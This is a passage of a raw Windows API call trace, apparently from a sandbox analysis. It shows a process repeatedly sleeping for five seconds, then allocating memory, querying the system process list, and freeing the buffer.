NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.364] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 